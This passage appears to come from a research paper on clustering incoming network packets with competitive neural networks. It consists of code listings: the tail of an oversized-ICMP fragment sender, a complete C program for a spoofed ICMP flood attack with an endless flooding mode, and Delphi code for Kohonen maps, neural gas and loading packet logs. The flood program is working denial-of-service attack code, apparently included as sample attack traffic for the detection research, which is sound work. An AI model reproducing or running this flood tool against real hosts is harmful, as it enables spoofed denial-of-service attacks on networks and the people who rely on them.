
Clustering of Groups of Incoming Packets Using Competitive Neural Networks

else

ip->ip_len = FIX(418); /* make total 65538 */

if (sendto(s, buf, sizeof buf, 0, (struct sockaddr *)&dst,

sizeof dst) < 0) {

fprintf(stderr, "offset %d: ", offset);

perror("sendto");

}

if (offset == 0) {

icmp->icmp_type = 0;

icmp->icmp_code = 0;

icmp->icmp_cksum = 0;

}

}

}

Listing 2. Flood attack using spoofed ICMP packets.

#include <sys/types.h>

#include <sys/socket.h>

#include <stdio.h>

#include <unistd.h>

#include <stdlib.h>

#include <string.h>

#include <netdb.h>

#include <netinet/ip.h>

#include <netinet/in.h>

#include <netinet/ip_icmp.h>

#include <arpa/inet.h> /* inet_ntoa() */

#include <strings.h> /* bzero(), bcopy() */

#define IPHDRSIZE sizeof(struct iphdr)

#define ICMPHDRSIZE sizeof(struct icmphdr)

#define VIRGIN "1.1"

void version(void) {

printf("flood %s - by FA-Q&bsol;n", VIRGIN);

}

void usage(const char *progname)

{

printf("usage: %s [-fV] [-c count] [-i wait] [-s packetsize] <target> <broadcast>&bsol;n",progname);

}

unsigned char *dest_name;

unsigned char *spoof_name = NULL;

struct sockaddr_in destaddr, spoofaddr;

unsigned long dest_addr;

unsigned long spoof_addr;

unsigned pingsize, pingsleep, pingnmbr;

char flood = 0;
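/*
 * in_cksum(): the standard 16-bit one's-complement Internet checksum
 * (RFC 1071) over len bytes starting at addr; used below for both the
 * IP and the ICMP headers.
 */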

unsigned short in_cksum(u_short *addr, int len)

{

register int nleft = len;

register u_short *w = addr;

register int sum = 0;

u_short answer = 0;

while (nleft > 1) {

sum += *w++;

nleft -= 2;

}

if (nleft == 1) {

*(u_char *)(&answer) = *(u_char *)w;

sum += answer;

}

sum = (sum >> 16) + (sum & 0xffff);

sum += (sum >> 16);

answer = ~sum;

return(answer);

}

int resolve( const char *name, struct sockaddr_in *addr, int port )

{

struct hostent *host;

bzero((char *)addr,sizeof(struct sockaddr_in));

if (( host = gethostbyname(name) ) == NULL ) {

fprintf(stderr,"%s will not resolve&bsol;n",name);

perror(""); return -1;

}

addr->sin_family = host->h_addrtype;

memcpy((caddr_t)&addr->sin_addr,host->h_addr,host->h_length);

addr->sin_port = htons(port);

return 0;

}

unsigned long addr_to_ulong(struct sockaddr_in *addr)

{

return addr->sin_addr.s_addr;

}

int resolve_one(const char *name, unsigned long *addr, const char *desc)

{

struct sockaddr_in tempaddr;

if (resolve(name, &tempaddr,0) == -1) {

printf("%s will not resolve&bsol;n",desc);

return -1;

}

*addr = tempaddr.sin_addr.s_addr;

return 0;

}

int resolve_all(const char *dest,

const char *spoof)

{

if (resolve_one(dest,&dest_addr,"dest address")) return -1;

if (spoof!=NULL)

if (resolve_one(spoof,&spoof_addr,"spoof address")) return -1;

spoofaddr.sin_addr.s_addr = spoof_addr;

spoofaddr.sin_family = AF_INET;

destaddr.sin_addr.s_addr = dest_addr;

destaddr.sin_family = AF_INET;

return 0;

}

void give_info(void)

{

printf("&bsol;nattacking (%s) from (%s)&bsol;n",inet_ntoa(spoof_addr),dest_name);

}

int parse_args(int argc, char *argv[])

{

int opt;

char *endptr;

while ((opt=getopt(argc, argv, "fc:s:i:V")) != -1) {

switch(opt) {

case 'f': flood = 1; break;

case 'c': pingnmbr = strtoul(optarg,&endptr,10);

if (*endptr != '\0') {

printf("%s is an invalid number '%s'.\n", argv[0], optarg);

return -1;

}

break;

case 's': pingsize = strtoul(optarg,&endptr,10);

if (*endptr != '\0') {

printf("%s is a bad packet size '%s'\n", argv[0], optarg);

return -1;

}

break;

case 'i': pingsleep = strtoul(optarg,&endptr,10);

if (*endptr != '\0') {

printf("%s is a bad wait time '%s'\n", argv[0], optarg);

return -1;

}

break;

case 'V': version(); break;

case '?':

case ':': return -1; break;

}

}

if (optind > argc-2) {

return -1;

}

if (!pingsize)

pingsize = 28;

else

pingsize = pingsize - 36;

if (!pingsleep)

pingsleep = 100;

spoof_name = argv[optind++];

dest_name = argv[optind++];

return 0;

}
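/*
 * icmp_echo_send(): builds a raw IP + ICMP echo-request packet whose source
 * address is the spoofed host and whose payload carries a second, fake IP
 * header, then writes it to the raw socket aimed at the destination address.
 */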

inline int icmp_echo_send(int socket,

unsigned long spoof_addr,

unsigned long t_addr,

unsigned pingsize)

{

unsigned char packet[5122];

struct iphdr *ip;

struct icmphdr *icmp;

struct iphdr *origip;

unsigned char *data;

int i;

ip = (struct iphdr *)packet;

icmp = (struct icmphdr *)(packet+IPHDRSIZE);

origip = (struct iphdr *)(packet+IPHDRSIZE+ICMPHDRSIZE);

data = (char *)(packet+pingsize+IPHDRSIZE+IPHDRSIZE+ICMPHDRSIZE);

memset(packet, 0, 5122);

ip->version = 4;

ip->ihl = 5;

ip->ttl = 255-random()%15;

ip->protocol = IPPROTO_ICMP;

ip->tot_len = htons(pingsize + IPHDRSIZE + ICMPHDRSIZE + IPHDRSIZE + 8);

bcopy((char *)&destaddr.sin_addr, &ip->daddr, sizeof(ip->daddr));

bcopy((char *)&spoofaddr.sin_addr, &ip->saddr, sizeof(ip->saddr));

ip->check = in_cksum(packet,IPHDRSIZE);

origip->version = 4;

origip->ihl = 5;

origip->ttl = ip->ttl - random()%15;

origip->protocol = IPPROTO_TCP;

origip->tot_len = IPHDRSIZE + 30;

origip->id = random()%69;

bcopy((char *)&destaddr.sin_addr, &origip->saddr, sizeof(origip->saddr));

origip->check = in_cksum(origip,IPHDRSIZE);

*((unsigned int *)data) = htons(pingsize);

icmp->type = 8; /* why should this be 3? */

icmp->code = 0;

icmp->checksum = in_cksum(icmp,pingsize+ICMPHDRSIZE+IPHDRSIZE+8);

return sendto(socket,packet,pingsize+IPHDRSIZE+ICMPHDRSIZE+IPHDRSIZE+8,0,

(struct sockaddr *)&destaddr,sizeof(struct sockaddr));

}

int main(int argc, char *argv[])

{

int s, i;

int floodloop;

if (parse_args(argc,argv))

{

usage(argv[0]);

return 1;

}

resolve_all(dest_name, spoof_name);

give_info();

s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);

if (!flood)

{

if (icmp_echo_send(s,spoof_addr,dest_addr,pingsize) == -1)

{

printf("%s error sending packet&bsol;n",argv[0]); perror(""); return;

}

}

else

{

floodloop = 0;

if ( pingnmbr && (pingnmbr > 0) )

{

printf("sending... packet limit set&bsol;n");

for (i=0;i<pingnmbr;i++)

{

if (icmp_echo_send(s,spoof_addr,dest_addr,pingsize) == -1)

{

printf("%s error sending packet&bsol;n",argv[0]); perror(""); return;

}

usleep((pingsleep*1000));

if (!(floodloop = (floodloop+1)%25))

{ fprintf(stdout,"."); fflush(stdout);

}

}

printf("&bsol;ncomplete, %u packets sent&bsol;n", pingnmbr);

}

else {

printf("flooding, (. == 25 packets)&bsol;n");

for (i=0;i<1;i) /* i never changes: endless flood loop */

{

if (icmp_echo_send(s,spoof_addr,dest_addr,pingsize) == -1)

{

printf("%s error sending packet&bsol;n",argv[0]); perror(""); return;

}

usleep(900);

if (!(floodloop = (floodloop+1)%25))

{ fprintf(stdout,"."); fflush(stdout);

}

}

}

}

return 0;

}

Listing 3. Self-organizing feature map.
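// TNeuron: a single neuron holding its weight vector MassWeight (index 0 is
// the bias), the weighted sum Status, the output Y and the activity counter
// Pos used by the "conscience" winner-take-all mechanism.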

TNeuron = class

public

IntVal : TIntArray;

ExtVal : TExtArray;

Pos : Extended;

Status : Extended;

Y : Extended;

MassWeight : Array of Extended;

constructor Init(a : PIntArray; b : PExtArray);

function FunctionActivation : Extended;

procedure GetAksonValue(a : PExtArray);

procedure Randomization;

procedure Distantion(a : PExtArray);

end;
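// TLayer: a layer of TNeuron objects with its own input and output vectors;
// Excitement propagates the current inputs through every neuron.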

TLayer = class

public

ExtArr : TExtArray;

Neurons : Array of TNeuron;

QNeurons : integer;

QInputs : integer;

InputValues : Array of Extended;

OutputValues : Array of Extended;

constructor Init(a : PIntArray; b : PExtArray);

procedure GetInputValues(Values : PExtArray);

procedure GetOutputValues;

procedure Excitement;

procedure randomization;

end;
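// TKohonenLayer: a competitive (Kohonen) layer arranged as an h x w map with
// learning rate eta and neighbourhood radius sigma. It implements
// winner-take-all with a conscience (TheWinnerTakesItAll), plain
// winner-take-all (Classic), single-winner and Gaussian-neighbourhood weight
// updates, the convex-combination input trick and a neural-gas update.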

TKohonenLayer = class(TLayer)

public

eta,sigma : Extended;

h,w : Word;

constructor Init(a : PIntArray; b : PExtArray);

procedure Normalize;

function TheWinnerTakesItAll : integer;

function Classic : integer;

procedure Learning(a : integer; SpeedLearn : Extended);

procedure LearningNeib(a : integer; SpeedLearn : Extended);

procedure SigmaInit(s : Extended);

procedure ConvexCombination(delta : Extended);

procedure NeuralGaz(SpeedLearn : Extended);

end;

procedure TKohonenLayer.SigmaInit(s : Extended);

begin

Sigma:=s;

end;
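// ConvexCombination: the inputs start near the uniform vector 1/sqrt(n) and
// are shifted toward the true input pattern as eta grows by delta on every
// call, while sigma is adjusted at the same time.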

procedure TKohonenLayer.ConvexCombination(delta : Extended);

var i : integer;

begin

eta:=eta+delta;

sigma:=sigma+0.1-10*delta;

for i:=0 to QInputs-1 do InputValues[i]:=InputValues[i]*eta+(1-eta)/sqrt(QInputs);

end;

constructor TKohonenLayer.Init(a : PIntArray; b : PExtArray);

var i : integer;

New : TIntArray;

begin

Inherited Init(a,b);

New:=a^;

H:=New.Value[3];

W:=Round(New.Value[2]/New.Value[3]);

Randomization;

for i:=0 to New.Value[2]-1 do Neurons[i].Pos:=3.75;

eta:=0;

end;

procedure TKohonenLayer.Normalize;

var i : integer;

Sum : Extended;

begin

Sum:=0;

for i:=0 to QInputs-1 do Sum:=Sum+Sqr(InputValues[i]);

for i:=0 to QInputs-1 do

InputValues[i]:=InputValues[i]/Sqrt(Sum);

end;
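// TheWinnerTakesItAll: winner-take-all with a "conscience": only neurons
// whose counter Pos exceeds 0.75 may win; the winner pays 0.75 from Pos while
// every other neuron gains 1/QNeurons, so frequent winners are held back.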

function TKohonenLayer.TheWinnerTakesItAll : integer;

var i,p : integer;

Min : Extended;

begin

Min:=Neurons[0].Y;

p:=0;

for i:=1 to QNeurons-1 do

begin

if Neurons[i].Pos>0.75 then

if Min>Neurons[i].Y then

begin

p:=i;

Min:=Neurons[i].Y;

end;

end;

for i:=0 to QNeurons-1 do Neurons[i].Y:=0;

for i:=0 to QNeurons-1 do

if i=p then Neurons[i].Pos:=Neurons[i].Pos-0.75

else Neurons[i].Pos:=Neurons[i].Pos+1/QNeurons;

Neurons[p].Y:=1;

GetOutputValues;

TheWinnerTakesItAll:=p;

end;
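// Classic: plain winner-take-all; the neuron with the smallest distance Y
// becomes the single active output.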

function TKohonenLayer.Classic : integer;

var i,p : integer;

Min : Extended;

begin

Min:=Neurons[0].Y;

p:=0;

for i:=1 to QNeurons-1 do

begin

if Min>Neurons[i].Y then

begin

p:=i;

Min:=Neurons[i].Y;

end;

end;

for i:=0 to QNeurons-1 do Neurons[i].Y:=0;

Neurons[p].Y:=1;

GetOutputValues;

Classic:=p;

end;
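// Learning: moves only the winner's weight vector toward the current input
// with step SpeedLearn.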

procedure TKohonenLayer.Learning(a : integer; SpeedLearn : Extended);

var i : integer;

begin

for i:=1 to QInputs do

Neurons[a].MassWeight[i]:=Neurons[a].MassWeight[i]+

SpeedLearn*(InputValues[i-1]-Neurons[a].MassWeight[i]);

end;
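// LearningNeib: SOM neighbourhood learning; every neuron j is moved toward
// the input with strength exp(-d^2/(2*sigma^2))*SpeedLearn, where d is the
// grid distance between neuron j and the winner a on the h x w map.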

procedure TKohonenLayer.LearningNeib(a : integer; SpeedLearn : Extended);

var i,j : integer;

begin

for j:=0 to QNeurons-1 do

begin

for i:=1 to QInputs do

Neurons[j].MassWeight[i]:=Neurons[j].MassWeight[i]+

exp(-(Sqr((j div w)-(a div w)) + Sqr((j mod h)-(a mod h)))/(2*Sqr(sigma)))

*SpeedLearn*(InputValues[i-1]-Neurons[j].MassWeight[i]);

end;

end;
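// NeuralGaz: "neural gas" update; the neurons are ranked by their distance to
// the input (the rank is stored in Mass) and every weight vector is pulled
// toward the input with strength exp(-rank/Sigma)*SpeedLearn.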

procedure TKohonenLayer.NeuralGaz(SpeedLearn : Extended);

var i,j,k,p : integer;

Mass : Array of Extended;

Min : Extended;

begin

SetLength(Mass,QNeurons);

for i:=0 to QNeurons-1 do Mass[i]:=-1;

p:=0;

for i:=0 to QNeurons-1 do

begin

p:=p+1;

Min:=999999;

k:=-1;

for j:=0 to QNeurons-1 do

begin

if Neurons[j].Y<Min then

if Mass[j]=-1 then

begin

k:=j;

Min:=Neurons[j].Y;

end;

end;

Mass[k]:=p;

end;

for j:=0 to QNeurons-1 do

begin

for i:=1 to QInputs do

Neurons[j].MassWeight[i]:=Neurons[j].MassWeight[i]+

exp(-Mass[j]/Sigma)*SpeedLearn*(InputValues[i-1]-Neurons[j].MassWeight[i]);

end;

end;

constructor TNeuron.Init(a : PIntArray; b : PExtArray);

var

New : TIntArray;

begin

New:=a^;

ExtVal:=b^;

IntVal:=TIntArray.Init(2);

IntVal.Value[0]:=New.Value[0]+1;

IntVal.Value[1]:=New.Value[1];

SetLength(MassWeight,IntVal.Value[0]);

if IntVal.Value[0]>0 then MassWeight[0]:=0;

Status:=0;

Y:=0;

Pos:=0;

end;
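// GetAksonValue: weighted sum of the inputs plus the bias MassWeight[0],
// passed through the activation function.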

procedure TNeuron.GetAksonValue(a : PExtArray);

var

i : integer;

b : TExtArray;

begin

b:=a^;

Status:=MassWeight[0];

for i:=1 to IntVal.Value[0]-1 do Status:=Status+MassWeight[i]*b.Value[i-1];

Y:=FunctionActivation;

end;
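// Distantion: Euclidean distance between the weight vector and the input
// pattern; the result is stored in Y.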

procedure TNeuron.Distantion(a : PExtArray);

var i : integer;

b : TExtArray;

begin

b:=a^;

Status:=0;

Y:=0; // reset before accumulating the squared differences

for i:=1 to IntVal.Value[0]-1 do Y:=Y+Sqr(MassWeight[i]-b.Value[i-1]);

Y:=Sqrt(Y);

end;
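// FunctionActivation: IntVal.Value[1] selects the activation: 1 is the
// logistic sigmoid with slope ExtVal.Value[0], 2 is linear.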

function TNeuron.FunctionActivation : Extended;

Var m : Extended;

begin

case IntVal.Value[1] of

1 : m:=1/(1+exp(-ExtVal.Value[0]*Status));

2 : m:=ExtVal.Value[0]*Status;

end;

FunctionActivation:=m;

end;

procedure TNeuron.Randomization;

var i : integer;

begin

for i:=0 to IntVal.Value[0]-1 do MassWeight[i]:=random(255);

end;
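// TLayer.Init: Value[0] of the integer parameter array gives the number of
// inputs and Value[2] the number of neurons; all neurons are created with the
// same settings, the input vector is zeroed and the output vector allocated.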

constructor TLayer.Init(a : PIntArray; b : PExtArray);

var i : integer;

//c : TIntArray;

IntArr : TIntArray;

begin

IntArr:=a^;

QInputs:=IntArr.Value[0];

QNeurons:=IntArr.Value[2];

IntArr.NewLength(2);

ExtArr:=b^;

SetLength(Neurons,QNeurons); // SetLength takes an element count, not a byte size

for i:=0 to QNeurons-1 do Neurons[i]:=TNeuron.Init(@IntArr,b);

SetLength(InputValues,QInputs);

for i:=0 to QInputs-1 do InputValues[i]:=0;

SetLength(OutputValues,QNeurons);

end;

procedure TLayer.GetInputValues(Values : PExtArray);

var i : integer;

a : TExtArray;

begin

a:=Values^;

for i:=0 to QInputs-1 do InputValues[i]:=a.Value[i];

end;
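// Excitement: copies the current inputs into a temporary array and excites
// every neuron through Distantion (the commented-out GetAksonValue call is
// the weighted-sum alternative), then refreshes OutputValues.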

procedure TLayer.Excitement;

var i : integer;

a : TExtArray;

begin

a:=TExtArray.Init(QInputs);

for i:=0 to QInputs-1 do a.Value[i]:=InputValues[i];

for i:=0 to QNeurons-1 do Neurons[i].Distantion(@a);//GetAksonValue(@a);

GetOutputValues;

end;

procedure TLayer.GetOutputValues;

var i : integer;

begin

for i:=0 to QNeurons-1 do OutputValues[i]:=Neurons[i].Y;

end;

procedure TLayer.randomization;

var i : integer;

begin

for i:=0 to QNeurons-1 do Neurons[i].Randomization;

end;
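// Button2Click: loads a packet journal (*.log) file, allocates the per-packet
// arrays (protocol, host, fragmentation, size, ...) and fills the column
// headers of the string grid.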

procedure TForm1.Button2Click(Sender: TObject);

var

F : TextFile;

i,j,p,s1,s2,k : integer;

Str : String;

Ch : Char;

Sum : integer;

Temp : Array of String;

begin

OpenDialog1.Filter:='Журнальный файл|*.log|'; // "Log file" filter

if (OpenDialog1.Execute) and fileExists(OpenDialog1.FileName) then

begin

AssignFile(F,OpenDialog1.FileName);

Reset(F);

ReadLn(F);

Read(F,Q);

SetLength(Prot,Q);

SetLength(Host,Q);

SetLength(LocalH,Q);

SetLength(Frag,Q);

SetLength(Size,Q);

SetLength(Proc,Q);

SetLength(Active,Q);

SetLength(HACK,Q);

MyList.Clear;

MyList.Add('Номер'); // "Number"

MyList.Add('Протокол'); // "Protocol"

MyList.Add('Хост'); // "Host"

MyList.Add('Своя ЛВС'); // "Own LAN"

MyList.Add('Фрагментация'); // "Fragmentation"

MyList.Add('Размер'); // "Size"

MyList.Add('Процессор %%'); // "CPU %%"

MyList.Add('Отвечает'); // "Responds"

StringGrid1.RowCount:=Q+1;

StringGrid1.Rows[0]:=MyList;